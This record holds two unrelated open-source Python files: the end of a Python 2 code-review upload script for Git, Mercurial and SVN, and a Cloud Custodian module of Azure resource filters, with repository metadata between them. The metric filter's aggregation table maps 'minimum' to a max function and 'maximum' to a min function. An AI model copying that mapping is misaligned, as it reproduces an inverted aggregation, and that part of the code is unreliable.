is_binary = self.IsBinary(filename)
status = None
if filename in self.renames:
status = "A +" # Match svn attribute name for renames.
if filename not in self.hashes:
# If a rename doesn't change the content, we never get a hash.
base_content = RunShell(["git", "show", "HEAD:" + filename])
elif not hash_before:
status = "A"
base_content = ""
elif not hash_after:
status = "D"
else:
status = "M"
is_image = self.IsImage(filename)
# Grab the before/after content if we need it.
# We should include file contents if it's text or it's an image.
if not is_binary or is_image:
# Grab the base content if we don't have it already.
if base_content is None and hash_before:
base_content = self.GetFileContent(hash_before, is_binary)
# Only include the "after" file if it's an image; otherwise it
# it is reconstructed from the diff.
if is_image and hash_after:
new_content = self.GetFileContent(hash_after, is_binary)
return (base_content, new_content, is_binary, status)
class MercurialVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Mercurial."""
def __init__(self, options, repo_dir):
super(MercurialVCS, self).__init__(options)
# Absolute path to repository (we can be in a subdir)
self.repo_dir = os.path.normpath(repo_dir)
# Compute the subdir
cwd = os.path.normpath(os.getcwd())
assert cwd.startswith(self.repo_dir)
self.subdir = cwd[len(self.repo_dir):].lstrip(r"\/")
if self.options.revision:
self.base_rev = self.options.revision
else:
self.base_rev = RunShell(["hg", "parent", "-q"]).split(':')[1].strip()
def _GetRelPath(self, filename):
"""Get relative path of a file according to the current directory,
given its logical path in the repo."""
assert filename.startswith(self.subdir), (filename, self.subdir)
return filename[len(self.subdir):].lstrip(r"\/")
def GenerateDiff(self, extra_args):
# If no file specified, restrict to the current subdir
extra_args = extra_args or ["."]
cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
data = RunShell(cmd, silent_ok=True)
svndiff = []
filecount = 0
for line in data.splitlines():
m = re.match("diff --git a/(\S+) b/(\S+)", line)
if m:
# Modify line to make it look like as it comes from svn diff.
# With this modification no changes on the server side are required
# to make upload.py work with Mercurial repos.
# NOTE: for proper handling of moved/copied files, we have to use
# the second filename.
filename = m.group(2)
svndiff.append("Index: %s" % filename)
svndiff.append("=" * 67)
filecount += 1
logging.info(line)
else:
svndiff.append(line)
if not filecount:
ErrorExit("No valid patches found in output from hg diff")
return "\n".join(svndiff) + "\n"
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
args = []
status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
silent_ok=True)
unknown_files = []
for line in status.splitlines():
st, fn = line.split(" ", 1)
if st == "?":
unknown_files.append(fn)
return unknown_files
def GetBaseFile(self, filename):
# "hg status" and "hg cat" both take a path relative to the current subdir
# rather than to the repo root, but "hg diff" has given us the full path
# to the repo root.
base_content = ""
new_content = None
is_binary = False
oldrelpath = relpath = self._GetRelPath(filename)
# "hg status -C" returns two lines for moved/copied files, one otherwise
out = RunShell(["hg", "status", "-C", "--rev", self.base_rev, relpath])
out = out.splitlines()
# HACK: strip error message about missing file/directory if it isn't in
# the working copy
if out[0].startswith('%s: ' % relpath):
out = out[1:]
if len(out) > 1:
# Moved/copied => considered as modified, use old filename to
# retrieve base contents
oldrelpath = out[1].strip()
status = "M"
else:
status, _ = out[0].split(' ', 1)
if ":" in self.base_rev:
base_rev = self.base_rev.split(":", 1)[0]
else:
base_rev = self.base_rev
if status != "A":
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True)
is_binary = "\0" in base_content # Mercurial's heuristic
if status != "R":
new_content = open(relpath, "rb").read()
is_binary = is_binary or "\0" in new_content
if is_binary and base_content:
# Fetch again without converting newlines
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True, universal_newlines=False)
if not is_binary or not self.IsImage(relpath):
new_content = None
return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
"""Splits a patch into separate pieces for each file.
Args:
data: A string containing the output of svn diff.
Returns:
A list of 2-tuple (filename, text) where text is the svn diff output
pertaining to filename.
"""
patches = []
filename = None
diff = []
for line in data.splitlines(True):
new_filename = None
if line.startswith('Index:'):
unused, new_filename = line.split(':', 1)
new_filename = new_filename.strip()
elif line.startswith('Property changes on:'):
unused, temp_filename = line.split(':', 1)
# When a file is modified, paths use '/' between directories, however
# when a property is modified '\' is used on Windows. Make them the same
# otherwise the file shows up twice.
temp_filename = temp_filename.strip().replace('\\', '/')
if temp_filename != filename:
# File has property changes but no modifications, create a new diff.
new_filename = temp_filename
if new_filename:
if filename and diff:
patches.append((filename, ''.join(diff)))
filename = new_filename
diff = [line]
continue
if diff is not None:
diff.append(line)
if filename and diff:
patches.append((filename, ''.join(diff)))
return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
"""Uploads a separate patch for each file in the diff output.
Returns a list of [patch_key, filename] for each file.
"""
patches = SplitPatch(data)
rv = []
for patch in patches:
if len(patch[1]) > MAX_UPLOAD_SIZE:
print ("Not uploading the patch for " + patch[0] +
" because the file is too large.")
continue
form_fields = [("filename", patch[0])]
if not options.download_base:
form_fields.append(("content_upload", "1"))
files = [("data", "data.diff", patch[1])]
ctype, body = EncodeMultipartFormData(form_fields, files)
url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
print "Uploading patch for " + patch[0]
response_body = rpc_server.Send(url, body, content_type=ctype)
lines = response_body.splitlines()
if not lines or lines[0] != "OK":
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
rv.append([lines[1], patch[0]])
return rv
def GuessVCSName():
"""Helper to guess the version control system.
This examines the current directory, guesses which VersionControlSystem
we're using, and returns an string indicating which VCS is detected.
Returns:
A pair (vcs, output). vcs is a string indicating which VCS was detected
and is one of VCS_GIT, VCS_MERCURIAL, VCS_SUBVERSION, or VCS_UNKNOWN.
output is a string containing any interesting output from the vcs
detection routine, or None if there is nothing interesting.
"""
# Mercurial has a command to get the base directory of a repository
# Try running it, but don't die if we don't have hg installed.
# NOTE: we try Mercurial first as it can sit on top of an SVN working copy.
try:
out, returncode = RunShellWithReturnCode(["hg", "root"])
if returncode == 0:
return (VCS_MERCURIAL, out.strip())
except OSError, (errno, message):
if errno != 2: # ENOENT -- they don't have hg installed.
raise
# Subversion has a .svn in all working directories.
if os.path.isdir('.svn'):
logging.info("Guessed VCS = Subversion")
return (VCS_SUBVERSION, None)
# Git has a command to test if you're in a git tree.
# Try running it, but don't die if we don't have git installed.
try:
out, returncode = RunShellWithReturnCode(["git", "rev-parse",
"--is-inside-work-tree"])
if returncode == 0:
return (VCS_GIT, None)
except OSError, (errno, message):
if errno != 2: # ENOENT -- they don't have git installed.
raise
return (VCS_UNKNOWN, None)
def GuessVCS(options):
"""Helper to guess the version control system.
This verifies any user-specified VersionControlSystem (by command line
or environment variable). If the user didn't specify one, this examines
the current directory, guesses which VersionControlSystem we're using,
and returns an instance of the appropriate class. Exit with an error
if we can't figure it out.
Returns:
A VersionControlSystem instance. Exits if the VCS can't be guessed.
"""
vcs = options.vcs
if not vcs:
vcs = os.environ.get("CODEREVIEW_VCS")
if vcs:
v = VCS_ABBREVIATIONS.get(vcs.lower())
if v is None:
ErrorExit("Unknown version control system %r specified." % vcs)
(vcs, extra_output) = (v, None)
else:
(vcs, extra_output) = GuessVCSName()
if vcs == VCS_MERCURIAL:
if extra_output is None:
extra_output = RunShell(["hg", "root"]).strip()
return MercurialVCS(options, extra_output)
elif vcs == VCS_SUBVERSION:
return SubversionVCS(options)
elif vcs == VCS_GIT:
return GitVCS(options)
ErrorExit(("Could not guess version control system. "
"Are you in a working copy directory?"))
def CheckReviewer(reviewer):
"""Validate a reviewer -- either a nickname or an email addres.
Args:
reviewer: A nickname or an email address.
Calls ErrorExit() if it is an invalid email address.
"""
if "@" not in reviewer:
return # Assume nickname
parts = reviewer.split("@")
if len(parts) > 2:
ErrorExit("Invalid email address: %r" % reviewer)
assert len(parts) == 2
if "." not in parts[1]:
ErrorExit("Invalid email address: %r" % reviewer)
def LoadSubversionAutoProperties():
"""Returns the content of [auto-props] section of Subversion's config file as
a dictionary.
Returns:
A dictionary whose key-value pair corresponds the [auto-props] section's
key-value pair.
In following cases, returns empty dictionary:
- config file doesn't exist, or
- 'enable-auto-props' is not set to 'true-like-value' in [miscellany].
"""
# Todo(hayato): Windows users might use different path for configuration file.
subversion_config = os.path.expanduser("~/.subversion/config")
if not os.path.exists(subversion_config):
return {}
config = ConfigParser.ConfigParser()
config.read(subversion_config)
if (config.has_section("miscellany") and
config.has_option("miscellany", "enable-auto-props") and
config.getboolean("miscellany", "enable-auto-props") and
config.has_section("auto-props")):
props = {}
for file_pattern in config.options("auto-props"):
props[file_pattern] = ParseSubversionPropertyValues(
config.get("auto-props", file_pattern))
return props
else:
return {}
def ParseSubversionPropertyValues(props):
"""Parse the given property value which comes from [auto-props] section and
returns a list whose element is a (svn_prop_key, svn_prop_value) pair.
See the following doctest for example.
>>> ParseSubversionPropertyValues('svn:eol-style=LF')
[('svn:eol-style', 'LF')]
>>> ParseSubversionPropertyValues('svn:mime-type=image/jpeg')
[('svn:mime-type', 'image/jpeg')]
>>> ParseSubversionPropertyValues('svn:eol-style=LF;svn:executable')
[('svn:eol-style', 'LF'), ('svn:executable', '*')]
"""
key_value_pairs = []
for prop in props.split(";"):
key_value = prop.split("=")
assert len(key_value) <= 2
if len(key_value) == 1:
# If value is not given, use '*' as a Subversion's convention.
key_value_pairs.append((key_value[0], "*"))
else:
key_value_pairs.append((key_value[0], key_value[1]))
return key_value_pairs
def GetSubversionPropertyChanges(filename):
"""Return a Subversion's 'Property changes on ...' string, which is used in
the patch file.
Args:
filename: filename whose property might be set by [auto-props] config.
Returns:
A string like 'Property changes on |filename| ...' if given |filename|
matches any entries in [auto-props] section. None, otherwise.
"""
global svn_auto_props_map
if svn_auto_props_map is None:
svn_auto_props_map = LoadSubversionAutoProperties()
all_props = []
for file_pattern, props in svn_auto_props_map.items():
if fnmatch.fnmatch(filename, file_pattern):
all_props.extend(props)
if all_props:
return FormatSubversionPropertyChanges(filename, all_props)
return None
def FormatSubversionPropertyChanges(filename, props):
"""Returns Subversion's 'Property changes on ...' strings using given filename
and properties.
Args:
filename: filename
props: A list whose element is a (svn_prop_key, svn_prop_value) pair.
Returns:
A string which can be used in the patch file for Subversion.
See the following doctest for example.
>>> print FormatSubversionPropertyChanges('foo.cc', [('svn:eol-style', 'LF')])
Property changes on: foo.cc
___________________________________________________________________
Added: svn:eol-style
+ LF
<BLANKLINE>
"""
prop_changes_lines = [
"Property changes on: %s" % filename,
"___________________________________________________________________"]
for key, value in props:
prop_changes_lines.append("Added: " + key)
prop_changes_lines.append(" + " + value)
return "\n".join(prop_changes_lines) + "\n"
def RealMain(argv, data=None):
"""The real main function.
Args:
argv: Command line arguments.
data: Diff contents. If None (default) the diff is generated by
the VersionControlSystem implementation returned by GuessVCS().
Returns:
A 2-tuple (issue id, patchset id).
The patchset id is None if the base files are not uploaded by this
script (applies only to SVN checkouts).
"""
logging.basicConfig(format=("%(asctime).19s %(levelname)s %(filename)s:"
"%(lineno)s %(message)s "))
os.environ['LC_ALL'] = 'C'
options, args = parser.parse_args(argv[1:])
global verbosity
verbosity = options.verbose
if verbosity >= 3:
logging.getLogger().setLevel(logging.DEBUG)
elif verbosity >= 2:
logging.getLogger().setLevel(logging.INFO)
vcs = GuessVCS(options)
base = options.base_url
if isinstance(vcs, SubversionVCS):
# Guessing the base field is only supported for Subversion.
# Note: Fetching base files may become deprecated in future releases.
guessed_base = vcs.GuessBase(options.download_base)
if base:
if guessed_base and base != guessed_base:
print "Using base URL \"%s\" from --base_url instead of \"%s\"" % \
(base, guessed_base)
else:
base = guessed_base
if not base and options.download_base:
options.download_base = True
logging.info("Enabled upload of base file")
if not options.assume_yes:
vcs.CheckForUnknownFiles()
if data is None:
data = vcs.GenerateDiff(args)
data = vcs.PostProcessDiff(data)
files = vcs.GetBaseFiles(data)
if verbosity >= 1:
print "Upload server:", options.server, "(change with -s/--server)"
if options.issue:
prompt = "Message describing this patch set: "
else:
prompt = "New issue subject: "
message = options.message or raw_input(prompt).strip()
if not message:
ErrorExit("A non-empty message is required")
rpc_server = GetRpcServer(options.server,
options.email,
options.host,
options.save_cookies,
options.account_type)
form_fields = [("subject", message)]
if base:
form_fields.append(("base", base))
if options.issue:
form_fields.append(("issue", str(options.issue)))
if options.email:
form_fields.append(("user", options.email))
if options.reviewers:
for reviewer in options.reviewers.split(','):
CheckReviewer(reviewer)
form_fields.append(("reviewers", options.reviewers))
if options.cc:
for cc in options.cc.split(','):
CheckReviewer(cc)
form_fields.append(("cc", options.cc))
description = options.description
if options.description_file:
if options.description:
ErrorExit("Can't specify description and description_file")
file = open(options.description_file, 'r')
description = file.read()
file.close()
if description:
form_fields.append(("description", description))
# Send a hash of all the base file so the server can determine if a copy
# already exists in an earlier patchset.
base_hashes = ""
for file, info in files.iteritems():
if not info[0] is None:
checksum = md5(info[0]).hexdigest()
if base_hashes:
base_hashes += "|"
base_hashes += checksum + ":" + file
form_fields.append(("base_hashes", base_hashes))
if options.private:
if options.issue:
print "Warning: Private flag ignored when updating an existing issue."
else:
form_fields.append(("private", "1"))
# If we're uploading base files, don't send the email before the uploads, so
# that it contains the file status.
if options.send_mail and options.download_base:
form_fields.append(("send_mail", "1"))
if not options.download_base:
form_fields.append(("content_upload", "1"))
if len(data) > MAX_UPLOAD_SIZE:
print "Patch is large, so uploading file patches separately."
uploaded_diff_file = []
form_fields.append(("separate_patches", "1"))
else:
uploaded_diff_file = [("data", "data.diff", data)]
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response_body = rpc_server.Send("/upload", body, content_type=ctype)
patchset = None
if not options.download_base or not uploaded_diff_file:
lines = response_body.splitlines()
if len(lines) >= 2:
msg = lines[0]
patchset = lines[1].strip()
patches = [x.split(" ", 1) for x in lines[2:]]
else:
msg = response_body
else:
msg = response_body
StatusUpdate(msg)
if not response_body.startswith("Issue created.") and \
not response_body.startswith("Issue updated."):
sys.exit(0)
issue = msg[msg.rfind("/")+1:]
if not uploaded_diff_file:
result = UploadSeparatePatches(issue, rpc_server, patchset, data, options)
if not options.download_base:
patches = result
if not options.download_base:
vcs.UploadBaseFiles(issue, rpc_server, patches, patchset, options, files)
if options.send_mail:
rpc_server.Send("/" + issue + "/mail", payload="")
return issue, patchset
def main():
try:
RealMain(sys.argv)
except KeyboardInterrupt:
print
StatusUpdate("Interrupted.")
sys.exit(1)
if __name__ == "__main__":
main()
| {
"content_hash": "8d188ba4064e8a9c66995d8adbdbb9fe",
"timestamp": "",
"source": "github",
"line_count": 1758,
"max_line_length": 80,
"avg_line_length": 37.0358361774744,
"alnum_prop": 0.6240304719777604,
"repo_name": "stori-es/stori_es",
"id": "ff0657b83d2e83d9b2848c6c11d3e0ba94a492aa",
"size": "65709",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "upload.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "881308"
},
{
"name": "Gherkin",
"bytes": "32367"
},
{
"name": "HTML",
"bytes": "23540"
},
{
"name": "Java",
"bytes": "4906774"
},
{
"name": "JavaScript",
"bytes": "656583"
},
{
"name": "PLpgSQL",
"bytes": "4417"
},
{
"name": "Python",
"bytes": "65709"
},
{
"name": "SQLPL",
"bytes": "83603"
},
{
"name": "Shell",
"bytes": "110846"
}
],
"symlink_target": ""
} |
import logging
import isodate
import operator
from abc import ABCMeta, abstractmethod
from concurrent.futures import as_completed
from datetime import timedelta
import six
from azure.mgmt.costmanagement.models import (QueryAggregation,
QueryComparisonExpression,
QueryDataset, QueryDefinition,
QueryFilter, QueryGrouping,
QueryTimePeriod, TimeframeType)
from azure.mgmt.policyinsights import PolicyInsightsClient
from c7n_azure.tags import TagHelper
from c7n_azure.utils import (IpRangeHelper, Math, ResourceIdParser,
StringUtils, ThreadHelper, now, utcnow, is_resource_group)
from dateutil.parser import parse
from msrest.exceptions import HttpOperationError
from c7n.filters import Filter, FilterValidationError, ValueFilter
from c7n.filters.core import PolicyValidationError
from c7n.filters.offhours import OffHour, OnHour, Time
from c7n.utils import chunks, get_annotation_prefix, type_schema
scalar_ops = {
'eq': operator.eq,
'equal': operator.eq,
'ne': operator.ne,
'not-equal': operator.ne,
'gt': operator.gt,
'greater-than': operator.gt,
'ge': operator.ge,
'gte': operator.ge,
'le': operator.le,
'lte': operator.le,
'lt': operator.lt,
'less-than': operator.lt
}
class MetricFilter(Filter):
"""
Filters Azure resources based on live metrics from the Azure monitor
Click `here
<https://docs.microsoft.com/en-us/azure/monitoring-and-diagnostics/monitoring-supported-metrics/>`_
for a full list of metrics supported by Azure resources.
:example:
Find all VMs with an average Percentage CPU greater than 75% over last 2 hours
.. code-block:: yaml
policies:
- name: vm-percentage-cpu
resource: azure.vm
filters:
- type: metric
metric: Percentage CPU
aggregation: average
op: gt
threshold: 75
timeframe: 2
:example:
Find KeyVaults with more than 1000 API hits in the last hour
.. code-block:: yaml
policies:
- name: keyvault-hits
resource: azure.keyvault
filters:
- type: metric
metric: ServiceApiHit
aggregation: total
op: gt
threshold: 1000
timeframe: 1
:example:
Find SQL servers with less than 10% average DTU consumption
across all databases over last 24 hours
.. code-block:: yaml
policies:
- name: dtu-consumption
resource: azure.sqlserver
filters:
- type: metric
metric: dtu_consumption_percent
aggregation: average
op: lt
threshold: 10
timeframe: 24
filter: "DatabaseResourceId eq '*'"
"""
DEFAULT_TIMEFRAME = 24
DEFAULT_INTERVAL = 'P1D'
DEFAULT_AGGREGATION = 'average'
aggregation_funcs = {
'average': Math.mean,
'total': Math.sum,
'count': Math.sum,
'minimum': Math.max,
'maximum': Math.min
}
schema = {
'type': 'object',
'required': ['type', 'metric', 'op', 'threshold'],
'additionalProperties': False,
'properties': {
'type': {'enum': ['metric']},
'metric': {'type': 'string'},
'op': {'enum': list(scalar_ops.keys())},
'threshold': {'type': 'number'},
'timeframe': {'type': 'number'},
'interval': {'enum': [
'PT1M', 'PT5M', 'PT15M', 'PT30M', 'PT1H', 'PT6H', 'PT12H', 'P1D']},
'aggregation': {'enum': ['total', 'average', 'count', 'minimum', 'maximum']},
'no_data_action': {'enum': ['include', 'exclude']},
'filter': {'type': 'string'}
}
}
schema_alias = True
def __init__(self, data, manager=None):
super(MetricFilter, self).__init__(data, manager)
# Metric name as defined by Azure SDK
self.metric = self.data.get('metric')
# gt (>), ge (>=), eq (==), le (<=), lt (<)
self.op = scalar_ops[self.data.get('op')]
# Value to compare metric value with self.op
self.threshold = self.data.get('threshold')
# Number of hours from current UTC time
self.timeframe = float(self.data.get('timeframe', self.DEFAULT_TIMEFRAME))
# Interval as defined by Azure SDK
self.interval = isodate.parse_duration(self.data.get('interval', self.DEFAULT_INTERVAL))
# Aggregation as defined by Azure SDK
self.aggregation = self.data.get('aggregation', self.DEFAULT_AGGREGATION)
# Aggregation function to be used locally
self.func = self.aggregation_funcs[self.aggregation]
# Used to reduce the set of metric data returned
self.filter = self.data.get('filter', None)
# Include or exclude resources if there is no metric data available
self.no_data_action = self.data.get('no_data_action', 'exclude')
def process(self, resources, event=None):
# Import utcnow function as it may have been overridden for testing purposes
from c7n_azure.utils import utcnow
# Get timespan
end_time = utcnow()
start_time = end_time - timedelta(hours=self.timeframe)
self.timespan = "{}/{}".format(start_time, end_time)
# Create Azure Monitor client
self.client = self.manager.get_client('azure.mgmt.monitor.MonitorManagementClient')
# Process each resource in a separate thread, returning all that pass filter
with self.executor_factory(max_workers=3) as w:
processed = list(w.map(self.process_resource, resources))
return [item for item in processed if item is not None]
def get_metric_data(self, resource):
cached_metric_data = self._get_cached_metric_data(resource)
if cached_metric_data:
return cached_metric_data['measurement']
try:
metrics_data = self.client.metrics.list(
self.get_resource_id(resource),
timespan=self.timespan,
interval=self.interval,
metricnames=self.metric,
aggregation=self.aggregation,
filter=self.get_filter(resource)
)
except HttpOperationError:
self.log.exception("Could not get metric: %s on %s" % (
self.metric, resource['id']))
return None
if len(metrics_data.value) > 0 and len(metrics_data.value[0].timeseries) > 0:
m = [getattr(item, self.aggregation)
for item in metrics_data.value[0].timeseries[0].data]
else:
m = None
self._write_metric_to_resource(resource, metrics_data, m)
return m
def get_resource_id(self, resource):
return resource['id']
def get_filter(self, resource):
return self.filter
def _write_metric_to_resource(self, resource, metrics_data, m):
resource_metrics = resource.setdefault(get_annotation_prefix('metrics'), {})
resource_metrics[self._get_metrics_cache_key()] = {
'metrics_data': metrics_data.as_dict(),
'measurement': m,
}
def _get_metrics_cache_key(self):
return "{}, {}, {}, {}, {}".format(
self.metric,
self.aggregation,
self.timeframe,
self.interval,
self.filter,
)
def _get_cached_metric_data(self, resource):
metrics = resource.get(get_annotation_prefix('metrics'))
if not metrics:
return None
return metrics.get(self._get_metrics_cache_key())
def passes_op_filter(self, resource):
m_data = self.get_metric_data(resource)
if m_data is None:
return self.no_data_action == 'include'
aggregate_value = self.func(m_data)
return self.op(aggregate_value, self.threshold)
def process_resource(self, resource):
return resource if self.passes_op_filter(resource) else None
DEFAULT_TAG = "custodian_status"
class TagActionFilter(Filter):
"""Filter resources for tag specified future action
Filters resources by a 'custodian_status' tag which specifies a future
date for an action.
The filter parses the tag values looking for an 'op@date'
string. The date is parsed and compared to do today's date, the
filter succeeds if today's date is gte to the target date.
The optional 'skew' parameter provides for incrementing today's
date a number of days into the future. An example use case might
be sending a final notice email a few days before terminating an
instance, or snapshotting a volume prior to deletion.
The optional 'skew_hours' parameter provides for incrementing the current
time a number of hours into the future.
Optionally, the 'tz' parameter can get used to specify the timezone
in which to interpret the clock (default value is 'utc')
:example:
.. code-block :: yaml
policies:
- name: vm-stop-marked
resource: azure.vm
filters:
- type: marked-for-op
# The default tag used is custodian_status
# but that is configurable
tag: custodian_status
op: stop
# Another optional tag is skew
tz: utc
"""
schema = type_schema(
'marked-for-op',
tag={'type': 'string'},
tz={'type': 'string'},
skew={'type': 'number', 'minimum': 0},
skew_hours={'type': 'number', 'minimum': 0},
op={'type': 'string'})
schema_alias = True
current_date = None
log = logging.getLogger('custodian.azure.filters.TagActionFilter')
def validate(self):
op = self.data.get('op')
if self.manager and op not in self.manager.action_registry.keys():
raise PolicyValidationError(
"Invalid marked-for-op op:%s in %s" % (op, self.manager.data))
tz = Time.get_tz(self.data.get('tz', 'utc'))
if not tz:
raise PolicyValidationError(
"Invalid timezone specified '%s' in %s" % (
self.data.get('tz'), self.manager.data))
return self
def process(self, resources, event=None):
self.tag = self.data.get('tag', DEFAULT_TAG)
self.op = self.data.get('op', 'stop')
self.skew = self.data.get('skew', 0)
self.skew_hours = self.data.get('skew_hours', 0)
self.tz = Time.get_tz(self.data.get('tz', 'utc'))
return super(TagActionFilter, self).process(resources, event)
def __call__(self, i):
v = i.get('tags', {}).get(self.tag, None)
if v is None:
return False
if ':' not in v or '@' not in v:
return False
msg, tgt = v.rsplit(':', 1)
action, action_date_str = tgt.strip().split('@', 1)
if action != self.op:
return False
try:
action_date = parse(action_date_str)
except Exception:
self.log.error("could not parse tag:%s value:%s on %s" % (
self.tag, v, i['InstanceId']))
return False
# current_date must match timezones with the parsed date string
if action_date.tzinfo:
action_date = action_date.astimezone(self.tz)
current_date = now(tz=self.tz)
else:
current_date = now()
return current_date >= (
action_date - timedelta(days=self.skew, hours=self.skew_hours))
class DiagnosticSettingsFilter(ValueFilter):
"""The diagnostic settings filter is implicitly just the ValueFilter
on the diagnostic settings for an azure resource.
:example:
Find Load Balancers that have logs for both LoadBalancerProbeHealthStatus category and
LoadBalancerAlertEvent category enabled.
The use of value_type: swap is important for these examples because it swaps the value
and the evaluated key so that it evaluates the value provided is in the logs.
.. code-block:: yaml
policies
- name: find-load-balancers-with-logs-enabled
resource: azure.loadbalancer
filters:
- type: diagnostic-settings
key: logs[?category == 'LoadBalancerProbeHealthStatus'][].enabled
value: True
op: in
value_type: swap
- type: diagnostic-settings
key: logs[?category == 'LoadBalancerAlertEvent'][].enabled
value: True
op: in
value_type: swap
:example:
Find KeyVaults that have logs enabled for the AuditEvent category.
.. code-block:: yaml
policies
- name: find-keyvaults-with-logs-enabled
resource: azure.keyvault
filters:
- type: diagnostic-settings
key: logs[?category == 'AuditEvent'][].enabled
value: True
op: in
value_type: swap
"""
schema = type_schema('diagnostic-settings', rinherit=ValueFilter.schema)
schema_alias = True
log = logging.getLogger('custodian.azure.filters.DiagnosticSettingsFilter')
def process(self, resources, event=None):
futures = []
results = []
# Process each resource in a separate thread, returning all that pass filter
with self.executor_factory(max_workers=3) as w:
for resource_set in chunks(resources, 20):
futures.append(w.submit(self.process_resource_set, resource_set))
for f in as_completed(futures):
if f.exception():
self.log.warning(
"Diagnostic settings filter error: %s" % f.exception())
continue
else:
results.extend(f.result())
return results
def process_resource_set(self, resources):
#: :type: azure.mgmt.monitor.MonitorManagementClient
client = self.manager.get_client('azure.mgmt.monitor.MonitorManagementClient')
matched = []
for resource in resources:
settings = client.diagnostic_settings.list(resource['id'])
settings = [s.as_dict() for s in settings.value]
filtered_settings = super(DiagnosticSettingsFilter, self).process(settings, event=None)
if filtered_settings:
matched.append(resource)
return matched
class PolicyCompliantFilter(Filter):
"""Filter resources based on Azure Policy compliance status
Filter resources by their current Azure Policy compliance status.
You can specify if you want to filter compliant or non-compliant resources.
You can provide a list of Azure Policy definitions display names or names to limit
amount of non-compliant resources. By default it returns a list of all non-compliant
resources.
.. code-block :: yaml
policies:
- name: non-compliant-vms
resource: azure.vm
filters:
- type: policy-compliant
compliant: false
definitions:
- "Definition display name 1"
- "Definition display name 2"
"""
schema = type_schema('policy-compliant', required=['type', 'compliant'],
compliant={'type': 'boolean'},
definitions={'type': 'array'})
schema_alias = True
def __init__(self, data, manager=None):
super(PolicyCompliantFilter, self).__init__(data, manager)
self.compliant = self.data['compliant']
self.definitions = self.data.get('definitions')
def process(self, resources, event=None):
s = self.manager.get_session()
definition_ids = None
# Translate definitions display names into ids
if self.definitions:
policyClient = s.client("azure.mgmt.resource.policy.PolicyClient")
definitions = [d for d in policyClient.policy_definitions.list()]
definition_ids = [d.id.lower() for d in definitions
if d.display_name in self.definitions or
d.name in self.definitions]
# Find non-compliant resources
client = PolicyInsightsClient(s.get_credentials())
query = client.policy_states.list_query_results_for_subscription(
policy_states_resource='latest', subscription_id=s.subscription_id).value
non_compliant = [f.resource_id.lower() for f in query
if not definition_ids or f.policy_definition_id.lower() in definition_ids]
if self.compliant:
return [r for r in resources if r['id'].lower() not in non_compliant]
else:
return [r for r in resources if r['id'].lower() in non_compliant]
class AzureOffHour(OffHour):
# Override get_tag_value because Azure stores tags differently from AWS
def get_tag_value(self, i):
tag_value = TagHelper.get_tag_value(resource=i,
tag=self.tag_key,
utf_8=True)
if tag_value is not False:
tag_value = tag_value.lower().strip("'\"")
return tag_value
class AzureOnHour(OnHour):
# Override get_tag_value because Azure stores tags differently from AWS
def get_tag_value(self, i):
tag_value = TagHelper.get_tag_value(resource=i,
tag=self.tag_key,
utf_8=True)
if tag_value is not False:
tag_value = tag_value.lower().strip("'\"")
return tag_value
@six.add_metaclass(ABCMeta)
class FirewallRulesFilter(Filter):
"""Filters resources by the firewall rules
Rules can be specified as x.x.x.x-y.y.y.y or x.x.x.x or x.x.x.x/y.
With the exception of **equal** all modes reference total IP space and ignore
specific notation.
**include**: True if all IP space listed is included in firewall.
**any**: True if any overlap in IP space exists.
**only**: True if firewall IP space only includes IPs from provided space
(firewall is subset of provided space).
**equal**: the list of IP ranges or CIDR that firewall rules must match exactly.
**IMPORTANT**: this filter ignores all bypass rules. If you want to ensure your resource is
not available for other Azure Cloud services or from the Portal, please use ``firewall-bypass``
filter.
:example:
.. code-block:: yaml
policies:
- name: servers-with-firewall
resource: azure.sqlserver
filters:
- type: firewall-rules
include:
- '131.107.160.2-131.107.160.3'
- 10.20.20.0/24
"""
schema = {
'type': 'object',
'additionalProperties': False,
'properties': {
'type': {'enum': ['firewall-rules']},
'include': {'type': 'array', 'items': {'type': 'string'}},
'any': {'type': 'array', 'items': {'type': 'string'}},
'only': {'type': 'array', 'items': {'type': 'string'}},
'equal': {'type': 'array', 'items': {'type': 'string'}}
},
'oneOf': [
{"required": ["type", "include"]},
{"required": ["type", "any"]},
{"required": ["type", "only"]},
{"required": ["type", "equal"]}
]
}
schema_alias = True
log = logging.getLogger('custodian.azure.filters.FirewallRulesFilter')
def __init__(self, data, manager=None):
super(FirewallRulesFilter, self).__init__(data, manager)
self.policy_include = None
self.policy_equal = None
self.policy_any = None
self.policy_only = None
self.client = None
def process(self, resources, event=None):
self.policy_include = IpRangeHelper.parse_ip_ranges(self.data, 'include')
self.policy_equal = IpRangeHelper.parse_ip_ranges(self.data, 'equal')
self.policy_any = IpRangeHelper.parse_ip_ranges(self.data, 'any')
self.policy_only = IpRangeHelper.parse_ip_ranges(self.data, 'only')
self.client = self.manager.get_client()
result, _ = ThreadHelper.execute_in_parallel(
resources=resources,
event=event,
execution_method=self._check_resources,
executor_factory=self.executor_factory,
log=self.log
)
return result
def _check_resources(self, resources, event):
return [r for r in resources if self._check_resource(r)]
@abstractmethod
def _query_rules(self, resource):
"""
Queries firewall rules for a resource. Override in concrete classes.
:param resource:
:return: A set of netaddr.IPSet with rules defined for the resource.
"""
raise NotImplementedError()
def _check_resource(self, resource):
resource_rules = self._query_rules(resource)
ok = self._check_rules(resource_rules)
return ok
def _check_rules(self, resource_rules):
if self.policy_equal is not None:
return self.policy_equal == resource_rules
elif self.policy_include is not None:
return self.policy_include.issubset(resource_rules)
elif self.policy_any is not None:
return not self.policy_any.isdisjoint(resource_rules)
elif self.policy_only is not None:
return resource_rules.issubset(self.policy_only)
else: # validated earlier, can never happen
raise FilterValidationError("Internal error.")
@six.add_metaclass(ABCMeta)
class FirewallBypassFilter(Filter):
"""Filters resources by the firewall bypass rules
"""
@staticmethod
def schema(values):
return type_schema(
'firewall-bypass',
required=['mode', 'list'],
